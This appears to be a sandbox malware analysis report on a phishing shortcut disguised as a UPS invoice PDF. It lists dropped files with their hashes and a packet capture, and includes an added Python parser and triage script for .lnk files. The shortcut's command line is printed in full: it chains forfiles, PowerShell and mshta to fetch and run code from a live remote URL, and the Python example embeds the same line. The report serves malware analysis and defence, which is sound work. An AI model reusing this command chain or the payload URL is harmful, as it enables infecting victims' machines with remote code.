                    SSDEEP:384:srnynnxkX1Ka3VjcEqRAoLPUJfIdC2WseZ9BP3HXVqyztwz443JRexePa9qRUFNK:M3m
                    MD5:79137306F99087B025B77B9B4FF43E92
                    SHA1:21F045A14EE61B38C5B3FF8EDC12E780F95AD9B6
                    SHA-256:1D5068872582BDF0D9789DDF067097FC3511656D8E7D4230BE82BF1F7818C139
                    SHA-512:2D132A2D1A46D2F0F7BA5BF7A0E3A436765E3F5FE8FE2764C3AE02276AD397468A8F66279460765E85E90AF914F5A10098564306812983A853F4E0960F960328
                    Malicious:false
                    Preview:SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:004-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="SetConf
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):29752
                    Entropy (8bit):5.416308919421175
                    Encrypted:false
                    SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbdbBB9+d4X+6zCO/OPhOQLQ94lcbk:ceo4+rsCt41
                    MD5:2356D077DFA9AA8845A4D2ECFE10B30B
                    SHA1:85B490A49417A5732C23A0482D41020914AAB5B0
                    SHA-256:037BB57466E1C6F759D702E7A9020D629F3EB21902A320DBF48CEB228AD7167F
                    SHA-512:86704C6A2208A521C3013955BE064B9CC666FE776E3C13C0B307264205C640CDE80EB7D9D4C773A24124D9CC656708F6C3D1272F66528DC7B582C42BE8F1AC71
                    Malicious:false
                    Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                    Category:dropped
                    Size (bytes):1419751
                    Entropy (8bit):7.976496077007677
                    Encrypted:false
                    SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                    MD5:95F182500FC92778102336D2D5AADCC8
                    SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                    SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                    SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                    Malicious:false
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                    Category:dropped
                    Size (bytes):758601
                    Entropy (8bit):7.98639316555857
                    Encrypted:false
                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                    MD5:3A49135134665364308390AC398006F1
                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                    Malicious:false
                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                    Category:dropped
                    Size (bytes):386528
                    Entropy (8bit):7.9736851559892425
                    Encrypted:false
                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                    Malicious:false
                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                    Category:dropped
                    Size (bytes):1407294
                    Entropy (8bit):7.97605879016224
                    Encrypted:false
                    SSDEEP:24576:/I+wYIGNP4bdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07mWL07oXGZd:LwZG6b3mlind9i4ufFXpAXkrfUs0CWLk
                    MD5:F5279DA3659F1FDF155BE793A409106A
                    SHA1:B389FCDB8832ABD4BC4A06CB7E97107FC5E139EA
                    SHA-256:4926C6879266E3E2301A1823FE1FF8772B1FA7A33163224B1B5C2695A0E372CA
                    SHA-512:07CA1BF523F22967695DF263E7477135C69F5B9F6B612B8037F9434C099F5BE132957DAC9619F13F97FDDD6A543E78D395755F7BB644B34D864C46239F7DDAD6
                    Malicious:false
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):1663264
                    Entropy (8bit):6.929148215184974
                    Encrypted:false
                    SSDEEP:49152:Plp9tHfYoEaTSiz23THT3WSMpDgF/qB0Rj6KIeVSc/zui+:PX/LEQkF/qBk6K2c/ii+
                    MD5:5EFEF6CC9CD24BAEEED71C1107FC32DF
                    SHA1:3CFC9764083154F682A38831C8229E3E29CBE3EF
                    SHA-256:E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021
                    SHA-512:CECD98F0E238D7387B44838251B795BB95E85EC8D35242FC24532BA21929759685205133923268BF8BC0E2DED37DB7D88ECBE2B692D2BE6F09C6D92A57D1FDAC
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."............................@....................................q ....`..................................................H..........@.......8m...... W...................................=..(...0...@............S...............................text...V........................... ..`.rdata..\...........................@..@.data....U..........................@....pdata..8m.......n..................@..@.00cfg..8...........................@..@.gxfg...`*.......,..................@..@.tls.................:..............@..._RDATA..\............<..............@..@.rsrc...@............>..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                    Category:dropped
                    Size (bytes):93556
                    Entropy (8bit):7.934411024179904
                    Encrypted:false
                    SSDEEP:1536:kKawmpcJxPhIUQR0iIN8oyG34uOqNckssvhi0Z3T9ADkkzgyMr2SSjW:kppSPhIUcIN4Is+i0tXyDS4W
                    MD5:3C93073ACD357CA95D13F097621CC38D
                    SHA1:566A4F6A4B23CD5CE56BB5F33FD7B411FC0205BF
                    SHA-256:ED8753A4B9351239ADE1B941E01897CDBF1928A788C194EAC468F198C45BD779
                    SHA-512:BADBC9BA9D89A3235919B7E652845940C9CA4C9E547A3219786E598F92973522EF0DD3B17337E2490B0F45544A9A5E45784F6F1AB0C8BF5F8C865D2C50C2967C
                    Malicious:false
                    Preview:%PDF-1.5..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 13 0 R/MarkInfo<</Marked true>>>>..endobj..2 0 obj..<</Type/Pages/Count 1/Kids[ 3 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 8 0 R/F3 10 0 R>>/ExtGState<</GS7 7 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 5611>>..stream..x..][....~_`.C?%3...d.oF. .dG..-[..`.....j.iG.Q.....X.5.Mv.$..aG3.,V.#..{.'/.....7O_<+.........^..=......(^......XQ.E'X9.........v.~V........b....?..=....x...q*.=/.........O[.lvwW....uW.#.Pi]..l|...J.$...^....U..b+6,.f...l........g..o.....#p.../y_t..[Q.+.....}.>?.....=U..).eYG.'5Z./{)..P...~..`M..:M.1<.q.x]....-fjt|%Q~.^..|..Am.2..$mD.-......S.O.m4..-[..2....RXt..6....vJ.+.9.....d._.KOz....6JE[..X..pK...Q.U..VY\.M.a.....gK^.._.%/....mo...x....#...P.]T.../3..~T@
                    Process:C:\Windows\System32\svchost.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):55
                    Entropy (8bit):4.306461250274409
                    Encrypted:false
                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                    Malicious:false
                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Wed Jun 12 01:24:42 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                    Entropy (8bit):4.648076363173948
                    TrID:
                    • Windows Shortcut (20020/1) 100.00%
                    File name:Invoice-UPS-218931.pdf.lnk.mal.lnk
                    File size:1'186 bytes
                    MD5:de45594e6e0700cd245eb48167b4d576
                    SHA1:7903bc25f029d194a31783adb0c26cc461ac2ef2
                    SHA256:d187de197e79e51a82eb727809d5fb6847c75104979ec9622429c2e74b55db5f
                    SHA512:ca2277723575799aa00169dbf3a641ef54d30095196a42a5f32d39dca3b563b0b2094de709387f28c633c388172eade8f60baf74e35a0978ffc4a678b2237167
                    SSDEEP:24:8d59hbIvDlpyAZPkEAc+/41+sPxZDSkaEabCWVIm0l:83YZgebnWkraRVIJl
                    TLSH:2621AB091BEA4B76E3B79F7D58B77A1689397C87ED57DF0D008045484095600E874F3A
                    File Content Preview:L..................F.... ...............o...................................E....P.O. .:i.....+00.../C:\...................V.1......X....Windows.@........OwH.X#^..............................W.i.n.d.o.w.s.....Z.1......Xg...System32..B........OwH.X!_......
                    Icon Hash:74f0e4e4e4e1e1ed

                    General

                    Relative Path:..\..\..\..\..\Windows\System32\forfiles.exe
                    Command Line Argument:/p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
                    Icon location:shell32.dll
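The three lines above are the whole infection chain: the shortcut's relative path points at forfiles.exe, a signed Windows binary, and its argument string makes forfiles "find" write.exe under C:\Windows only so that its /c clause runs PowerShell, which in turn hands a remote URL to mshta. Nothing malicious is stored in the .lnk itself beyond that string, so triage comes down to reading the ShellLinkHeader and StringData sections. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it builds a minimal MS-SHLLINK file (header plus StringData only, with no LinkTargetIDList or LinkInfo, unlike the real sample, which has an ID list), parses it back, and applies a few triage rules. The relative path, command line, icon location and file name are the values shown above; the shortcut bytes are constructed, the LOLBin keyword list is an assumption, and setting ShowCommand to SW_SHOWMINNOACTIVE (7) is an assumption consistent with the minimized window state libmagic reports for the sample, not a value read from it.

```python
import re
import struct

# Minimal MS-SHLLINK constants (ShellLinkHeader is always 0x4C bytes).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # window minimized and not activated: the user sees nothing

# Values taken from the report; the shortcut bytes themselves are constructed below.
SAMPLE_RELATIVE_PATH = r"..\..\..\..\..\Windows\System32\forfiles.exe"
SAMPLE_ARGUMENTS = (r'/p C:\Windows /m write.exe /c "powershell . mshta '
                    'https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"')
SAMPLE_FILE_NAME = "Invoice-UPS-218931.pdf.lnk"

# StringData order is fixed by the spec: uint16 character count, then the characters.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumed keyword list: signed Windows binaries commonly abused as shortcut targets.
LOLBIN_RE = re.compile(
    r"\b(forfiles|mshta|powershell|pwsh|cmd|wscript|cscript|rundll32|regsvr32|"
    r"certutil|bitsadmin|msiexec)(?:\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _string_data(s):
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path, arguments, icon_location="", show_command=SW_SHOWMINNOACTIVE):
    """Build a minimal Unicode .lnk: header + StringData + terminal block, no IDList/LinkInfo."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    if icon_location:
        flags |= HAS_ICON_LOCATION
    header = struct.pack(
        "<I16sIIQQQIIIH2sII",
        0x4C, LNK_CLSID, flags,
        0x20,               # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
        0, 0, 0,            # Creation/Access/Write FILETIMEs (zeroed in this constructed file)
        0, 0,               # FileSize, IconIndex
        show_command,
        0, b"\0\0", 0, 0,   # HotKey, Reserved1, Reserved2, Reserved3
    )
    body = _string_data(relative_path) + _string_data(arguments)
    if icon_location:
        body += _string_data(icon_location)
    return header + body + struct.pack("<I", 0)  # ExtraData terminal block


def parse_lnk(data):
    """Read the header and StringData, skipping LinkTargetIDList/LinkInfo by their size fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize or LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_command}
    width = 2 if flags & IS_UNICODE else 1
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        raw = data[off:off + count * width]
        off += count * width
        info[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", errors="replace")
    return info


def triage(info, file_name=""):
    """Return the reasons a parsed shortcut looks weaponized (empty list means none found)."""
    reasons = []
    target = info.get("relative_path", "") + " " + info.get("arguments", "")
    lolbins = sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(target)})
    if lolbins:
        reasons.append("LOLBin in target or arguments: " + ", ".join(lolbins))
    urls = URL_RE.findall(info.get("arguments", ""))
    if urls:
        reasons.append("remote URL in arguments: " + ", ".join(urls))
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (launched window hidden from the user)")
    if re.search(r"\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.lnk$", file_name.lower()):
        reasons.append("document-style double extension: " + file_name)
    return reasons


if __name__ == "__main__":
    parsed = parse_lnk(build_lnk(SAMPLE_RELATIVE_PATH, SAMPLE_ARGUMENTS, "shell32.dll"))
    for key in ("relative_path", "arguments", "icon_location", "show_command"):
        print(f"{key}: {parsed[key]}")
    for reason in triage(parsed, SAMPLE_FILE_NAME):
        print("  !", reason)
```

Run against the constructed shortcut, the parser returns the forfiles relative path and the full mshta command line, and triage reports three LOLBins, the remote URL, the hidden window and the .pdf.lnk double extension. On a real sample the same parser works because it skips the LinkTargetIDList and LinkInfo blocks by their own length fields; what it does not do is follow the URL, which is the right boundary for static triage.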
                    Timestamp                          Source Port  Dest Port  Source IP     Dest IP
                    Jul 2, 2024 12:47:20.437999964 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:20.438055038 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:20.438137054 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:20.448259115 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:20.448282957 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:21.633876085 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:21.633980036 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:21.769401073 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:21.769440889 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:21.769800901 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:21.769870043 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:21.772070885 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:21.812503099 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.165719986 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.165745974 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.165760994 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.165803909 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.165841103 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.165849924 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.165894032 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.167642117 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.167659998 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.167730093 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.167736053 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.167783976 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.287976027 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.288003922 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.288065910 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.288086891 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.288110971 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.288126945 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.289877892 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.289897919 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.289963961 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.289972067 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.290005922 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.291693926 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.291708946 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.291753054 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.291759968 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.291798115 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.293028116 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.293042898 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.293102026 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.293107986 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.293147087 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.410855055 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.410878897 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.410963058 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.410988092 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.411031961 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.411961079 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.411976099 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.412024975 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.412034035 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.412094116 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.412094116 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.413026094 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.413041115 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.413175106 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.413183928 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.413229942 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.414352894 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.414367914 CEST  443  49705  5.188.88.146  192.168.2.8
                    Jul 2, 2024 12:47:22.414444923 CEST  49705  443  192.168.2.8  5.188.88.146
                    Jul 2, 2024 12:47:22.414449930 CEST  443  49705  5.188.88.146  192.168.2.8
